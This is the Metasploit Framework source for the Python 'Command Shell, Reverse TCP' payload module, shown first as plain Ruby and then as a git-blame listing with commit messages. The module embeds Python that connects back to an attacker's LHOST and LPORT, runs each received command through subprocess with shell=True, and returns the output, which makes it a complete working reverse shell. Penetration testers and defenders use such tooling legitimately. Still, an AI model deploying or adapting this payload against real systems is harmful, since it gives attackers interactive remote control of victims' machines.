modules/payloads/singles/python/shell_reverse_tcp.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


module MetasploitModule

  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Payload::Python
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Command Shell, Reverse TCP (via python)',
      'Description'   => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.',
      'Author'        => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
      'License'       => MSF_LICENSE,
      'Platform'      => 'python',
      'Arch'          => ARCH_PYTHON,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShell,
      'PayloadType'   => 'python',
      'Payload'       =>
        {
          'Offsets' => { },
          'Payload' => ''
        }
      ))
  end

  #
  # Constructs the payload
  #
  def generate(_opts = {})
    super + command_string
  end

  #
  # Returns the command string to use for execution
  #
  def command_string
    cmd = <<~PYTHON
      import socket as s
      import subprocess as r
      so=s.socket(s.AF_INET,s.SOCK_STREAM)
      so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
      while True:
      	d=so.recv(1024)
      	if len(d)==0:
      		break
      	p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
      	o=p.stdout.read()+p.stderr.read()
      	so.send(o)
    PYTHON

    py_create_exec_stub(cmd)
  end
end
Compat 2014-06-04 02:27:06 +01:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Compat 2014-06-04 02:27:06 +01:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`


use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`module MetasploitModule`
Compat 2014-06-04 02:27:06 +01:00
Update Python payloads to have dynamic sizes 2022-11-05 15:58:10 -04:00			`CachedSize = :dynamic`
The result of running ./tools/update_payload_cached_sizes.rb 2015-03-09 15:31:04 -05:00
Compat 2014-06-04 02:27:06 +01:00			`include Msf::Payload::Single`
fix #14207 , fix python/shell_reverse_tcp on python3 2020-10-30 17:42:57 +08:00			`include Msf::Payload::Python`
Compat 2014-06-04 02:27:06 +01:00			`include Msf::Sessions::CommandShellOptions`

			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'Command Shell, Reverse TCP (via python)',`
Tweak the Python single payload descriptions 2020-11-20 16:33:35 -05:00			`'Description' => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.',`
Compat 2014-06-04 02:27:06 +01:00			`'Author' => 'Ben Campbell', # Based on RageLtMan's reverse_ssl`
License and Require 2014-06-09 21:41:38 +01:00			`'License' => MSF_LICENSE,`
Compat 2014-06-04 02:27:06 +01:00			`'Platform' => 'python',`
			`'Arch' => ARCH_PYTHON,`
			`'Handler' => Msf::Handler::ReverseTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'python',`
			`'Payload' =>`
			`{`
			`'Offsets' => { },`
			`'Payload' => ''`
			`}`
			`))`
			`end`

			`#`
			`# Constructs the payload`
			`#`
Fix crash when generating payload sizes 2022-11-04 00:33:03 +00:00			`def generate(_opts = {})`
Compat 2014-06-04 02:27:06 +01:00			`super + command_string`
			`end`

			`#`
			`# Returns the command string to use for execution`
			`#`
			`def command_string`
python code golf and convert to squiggly heredoc 2020-11-06 13:53:22 +08:00			`cmd = <<~PYTHON`
			`import socket as s`
			`import subprocess as r`
			`so=s.socket(s.AF_INET,s.SOCK_STREAM)`
			`so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))`
			`while True:`
fixing indentation for shell reverse tcp payload 2023-06-08 06:52:33 +05:30			`d=so.recv(1024)`
			`if len(d)==0:`
			`break`
			`p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)`
			`o=p.stdout.read()+p.stderr.read()`
			`so.send(o)`
python code golf and convert to squiggly heredoc 2020-11-06 13:53:22 +08:00			`PYTHON`
Compat 2014-06-04 02:27:06 +01:00
fix #14207 , fix python/shell_reverse_tcp on python3 2020-10-30 17:42:57 +08:00			`py_create_exec_stub(cmd)`
Compat 2014-06-04 02:27:06 +01:00			`end`
			`end`